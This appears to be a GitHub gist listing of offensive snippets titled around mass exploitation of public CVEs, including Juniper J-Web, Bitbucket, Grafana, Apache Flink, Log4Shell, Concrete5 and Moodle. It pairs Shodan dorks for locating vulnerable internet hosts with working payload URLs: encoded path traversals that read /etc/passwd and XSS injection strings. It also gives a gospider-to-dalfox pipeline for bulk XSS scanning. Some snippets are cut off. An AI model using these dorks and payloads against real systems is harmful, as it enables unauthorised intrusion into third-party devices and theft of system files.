Skip to content

Instantly share code, notes, and snippets.

@simrotion13
simrotion13 / CVE-2023-36845
Created October 1, 2023 03:38
CVE-2023-36845
Hi Guys..
In this video, we will see mass exploitation of Juniper Web Device Manager - RCE vulnerability (CVE-2023-36845).
Description: A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to control certain environments variables to execute remote commands
Shodan Dork : title:"Juniper" http.favicon.hash:2141724739
Download the results using below command ( Shodan Premium API Key is needed )
Hi Guys..
Today We explore the Atlassian Bitbucket Command Injection Vulnerability(CVE-2022-36804)
Description: Multiple API endpoints in Atlassian Bitbucket Server and Data Center 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, and from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1 allows remote attackers with read permissions to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request
Shodan Dork : 'http.component:"BitBucket"'
Run below commands to download the results ( Shodan Premium API Key is needed )
shodan download bitbucket 'http.component:"BitBucket"' <--- This will download 1000 results
#cat targets_urls.txt
http://testphp.vulnweb.com
## Command Line
gospider -S targets_urls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe -o result.txt
#tool used
#https://github.com/jaeles-project/gospider
#https://github.com/tomnomnom/qsreplace
#python3 need
#Install mmh3 by running command pip install mmh3
import mmh3
import requests
import codecs
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
response = requests.get('https://licious.in/favicon.ico', verify=False)
#!/bin/bash
filename=$1
resolversFile=$2
resultDir=~/recon/output
nucleiTmpDir=~/nuclei-templates
Header='User-Agent: Mozllla/5.0 (Macintosh; Intel Mac OS X 10_13_0) AppleWebKlt/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safarl/537.36'
nuclei -ut
for line in $(cat $1); do
Concrete5 CMS XSS vulnerability tweet by Jackson
Shodan Dork : 'Set-Cookie: CONCRETE5'
Vulnerable URL :
https://IP:PORT/ccm/system/panels/page/preview_as_user/preview?cID="></iframe><img/src/onerror=.1|alert(document.domain)>
By using below URL we can download the results. ( Shodan Premium API Key is needed )
shodan download concrete5 'Set-Cookie: CONCRETE5'
Moodle XSS vulnerability
Shodan Dork : 'http.component:Moodle'
Vulnerable URL :
https://IP/mod/lti/auth.php?redirect_uri=javascript:alert(document.domain)
By using below URL we can download the results. ( Shodan Premium API Key is needed )
shodan download moodle http.component:Moodle'
Mass exploitation of Apache Flink RESTful API Arbitrary File Read vulnerability [CVE-2020-17519]
Description: A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process.
Shodan Dork : 'Apache Flink'
Affected Version : 1.11.1 and 1.11.2
Vulnerable URL :
https://host:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
Mass exploitation of Grafana 8.x Path Traversal (Pre-Auth) vulnerability (CVE-2021-43798).
Description: Grafana is an open-source platform for monitoring and observability. Grafana versions 8.0.0-beta1 through 8.3.0 (except for patched versions) is vulnerable to directory traversal, allowing access to local files.
Users are advised to upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1.
Vulnerable URL :
http://IP:PORT/public/plugins/alertlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
Shodan Dork : http.title:"grafana"
Description: Apache Log4j2 versions up to and including 2.14.1 (excluding security release 2.12.2), are vulnerable to a remote code execution vulnerability. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
Prerequiste
Docker must be install. Go to below link to see how to install docker on kali linux
https://youtu.be/xN2JGqiqgow
Steps
A) Download log4j vulnerable app from below github link
https://github.com/simrotion13/log4shell-vulnerable-app